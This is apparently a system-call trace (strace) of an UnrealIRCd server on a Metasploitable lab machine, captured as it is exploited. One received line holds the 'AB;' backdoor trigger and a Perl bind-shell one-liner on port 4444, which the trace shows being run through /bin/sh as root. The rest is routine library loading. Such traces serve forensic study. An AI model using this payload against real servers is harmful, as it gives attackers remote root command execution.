4519  07:31:01.011973 select(1024, [2 3 4 7 9], [], NULL, {0, 480000}) = 1 (in [2], left {0, 300000})

4519  07:31:01.191639 clock_gettime(CLOCK_MONOTONIC, {2271, 8661148}) = 0

4519  07:31:01.191662 accept(2, 0, NULL) = 5

4519  07:31:01.191696 getpeername(5, {sa_family=AF_INET, sin_port=htons(40323), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:31:01.191728 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:31:01.191741 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:31:01.191756 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:31:01.191768 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:31:01.191779 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:31:01.191790 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:31:01.191805 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:31:01.191822 clock_gettime(CLOCK_MONOTONIC, {2271, 8835101}) = 0

4519  07:31:01.191833 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:31:01.191845 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:31:01.191855 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:31:01.191864 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:31:01.191893 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:31:01.191991 send(6, "\207\206\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:31:01.192190 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:31:01.192247 gettimeofday({1495625461, 192251}, NULL) = 0

4519  07:31:01.192260 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:31:01.196507 clock_gettime(CLOCK_MONOTONIC, {2271, 13524741}) = 0

4519  07:31:01.196524 recvfrom(6, "\207\206\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0l\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:31:01.196566 close(6)          = 0

4519  07:31:01.196581 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:31:01.196595 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:31:01.196653 time(NULL)        = 1495625461

4519  07:31:01.196665 time(NULL)        = 1495625461

4519  07:31:01.196680 gettimeofday({1495625461, 196685}, NULL) = 0

4519  07:31:01.196705 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:31:01.196765 clock_gettime(CLOCK_MONOTONIC, {2271, 13791961}) = 0

4519  07:31:01.196790 gettimeofday({1495625461, 196793}, NULL) = 0

4519  07:31:01.196822 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:31:01.197175 clock_gettime(CLOCK_MONOTONIC, {2271, 14189894}) = 0

4519  07:31:01.197242 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:31:01.197290 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:31:01.197313 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:31:01.197325 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:31:01.197341 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10032

10032 07:31:01.197408 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10032 07:31:01.197423 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10032 07:31:01.197434 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10032 07:31:01.197448 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10032 07:31:01.197567 brk(0)            = 0x80f9000

10032 07:31:01.197589 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10032 07:31:01.197605 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f10000

10032 07:31:01.197621 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10032 07:31:01.197638 open("/etc/ld.so.cache", O_RDONLY) = 1

10032 07:31:01.197651 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10032 07:31:01.197670 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f08000

10032 07:31:01.197680 close(1)          = 0

10032 07:31:01.197704 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10032 07:31:01.197747 open("/lib/libncurses.so.5", O_RDONLY) = 1

10032 07:31:01.197761 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10032 07:31:01.197871 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10032 07:31:01.197890 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ed8000

10032 07:31:01.197902 mmap2(0xb7f05000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f05000

10032 07:31:01.197919 close(1)          = 0

10032 07:31:01.197931 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10032 07:31:01.197945 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10032 07:31:01.197959 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10032 07:31:01.198049 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10032 07:31:01.198067 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ed4000

10032 07:31:01.198078 mmap2(0xb7ed6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ed6000

10032 07:31:01.198093 close(1)          = 0

10032 07:31:01.198105 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10032 07:31:01.198123 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10032 07:31:01.198137 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10032 07:31:01.198279 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10032 07:31:01.198297 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ed3000

10032 07:31:01.198326 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d84000

10032 07:31:01.198340 mmap2(0xb7ecd000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ecd000

10032 07:31:01.198376 mmap2(0xb7ed0000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ed0000

10032 07:31:01.198391 close(1)          = 0

10032 07:31:01.198415 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d83000

10032 07:31:01.198431 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d836b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10032 07:31:01.198490 mprotect(0xb7ecd000, 4096, PROT_READ) = 0

10032 07:31:01.198564 munmap(0xb7f08000, 29913) = 0

10032 07:31:01.198590 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10032 07:31:01.198605 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10032 07:31:01.198625 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd336f0) = -1 ENOTTY (Inappropriate ioctl for device)

10032 07:31:01.198656 brk(0)            = 0x80f9000

10032 07:31:01.198666 brk(0x80fa000)    = 0x80fa000

10032 07:31:01.198678 brk(0x80fb000)    = 0x80fb000

10032 07:31:01.198742 getuid32()        = 0

10032 07:31:01.198757 getgid32()        = 0

10032 07:31:01.198766 geteuid32()       = 0

10032 07:31:01.198790 getegid32()       = 0

10032 07:31:01.198804 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10032 07:31:01.198845 time(NULL)        = 1495625461

10032 07:31:01.198858 brk(0x80fc000)    = 0x80fc000

10032 07:31:01.198887 brk(0x80fd000)    = 0x80fd000

10032 07:31:01.198907 open("/proc/meminfo", O_RDONLY) = 1

10032 07:31:01.198930 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10032 07:31:01.198948 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f0f000

10032 07:31:01.198961 read(1, "MemTotal:      1035240 kB\nMemFree:        435340 kB\nBuffers:         75212 kB\nCached:         365628 kB\nSwapCached:          0 kB\nActive:         256156 kB\nInactive:       313648 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        435100 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4028 kB\nWriteback:           0 kB\nAnonPages:      129016 kB\nMapped:          51968 kB\nSlab:            18848 kB\nSReclaimable:    10320 kB\nSUnreclaim:       8528 kB\nPageTables:       1956 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10032 07:31:01.199052 close(1)          = 0

10032 07:31:01.199064 munmap(0xb7f0f000, 4096) = 0

10032 07:31:01.199076 brk(0x80fe000)    = 0x80fe000

10032 07:31:01.199102 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10032 07:31:01.199116 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10032 07:31:01.199128 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10032 07:31:01.199140 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10032 07:31:01.199152 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10032 07:31:01.199164 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10032 07:31:01.199178 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10032 07:31:01.199219 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10032 07:31:01.199234 uname({sys="Linux", node="metasploitable", ...}) = 0

10032 07:31:01.199297 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10032 07:31:01.199316 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10032 07:31:01.199334 brk(0x8100000)    = 0x8100000

10032 07:31:01.199346 getcwd("/etc/unreal", 4096) = 12

10032 07:31:01.199361 getpid()          = 10032

10032 07:31:01.199378 getppid()         = 4519

10032 07:31:01.199394 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10032 07:31:01.199414 stat64("/sbin/sh", 0xbfd336c8) = -1 ENOENT (No such file or directory)

10032 07:31:01.199426 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10032 07:31:01.199445 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10032 07:31:01.199470 socket(PF_FILE, SOCK_STREAM, 0) = 1

10032 07:31:01.199483 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10032 07:31:01.199495 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10032 07:31:01.199518 close(1)          = 0

10032 07:31:01.199530 socket(PF_FILE, SOCK_STREAM, 0) = 1

10032 07:31:01.199540 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10032 07:31:01.199550 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10032 07:31:01.199568 close(1)          = 0

10032 07:31:01.199582 open("/etc/nsswitch.conf", O_RDONLY) = 1

10032 07:31:01.199596 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10032 07:31:01.199613 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f0f000

10032 07:31:01.199624 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10032 07:31:01.199674 read(1, "", 4096) = 0

10032 07:31:01.199698 close(1)          = 0

10032 07:31:01.199708 munmap(0xb7f0f000, 4096) = 0

10032 07:31:01.199750 open("/etc/ld.so.cache", O_RDONLY) = 1

10032 07:31:01.199763 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10032 07:31:01.199794 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f08000

10032 07:31:01.199805 close(1)          = 0

10032 07:31:01.199816 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10032 07:31:01.199831 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10032 07:31:01.199846 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10032 07:31:01.199941 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10032 07:31:01.199958 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d7a000

10032 07:31:01.199971 mmap2(0xb7d81000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d81000

10032 07:31:01.199989 close(1)          = 0

10032 07:31:01.200001 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10032 07:31:01.200014 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10032 07:31:01.200028 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10032 07:31:01.200799 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10032 07:31:01.200818 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d62000

10032 07:31:01.200845 mmap2(0xb7d76000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d76000

10032 07:31:01.200885 mmap2(0xb7d78000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d78000

10032 07:31:01.200915 close(1)          = 0

10032 07:31:01.200945 munmap(0xb7f08000, 29913) = 0

10032 07:31:01.200964 open("/etc/ld.so.cache", O_RDONLY) = 1

10032 07:31:01.200992 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10032 07:31:01.201009 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f08000

10032 07:31:01.201019 close(1)          = 0

10032 07:31:01.201030 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10032 07:31:01.201045 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10032 07:31:01.201059 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10032 07:31:01.201154 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10032 07:31:01.201186 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d58000

10032 07:31:01.201207 mmap2(0xb7d60000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d60000

10032 07:31:01.201240 close(1)          = 0

10032 07:31:01.201253 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10032 07:31:01.201280 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

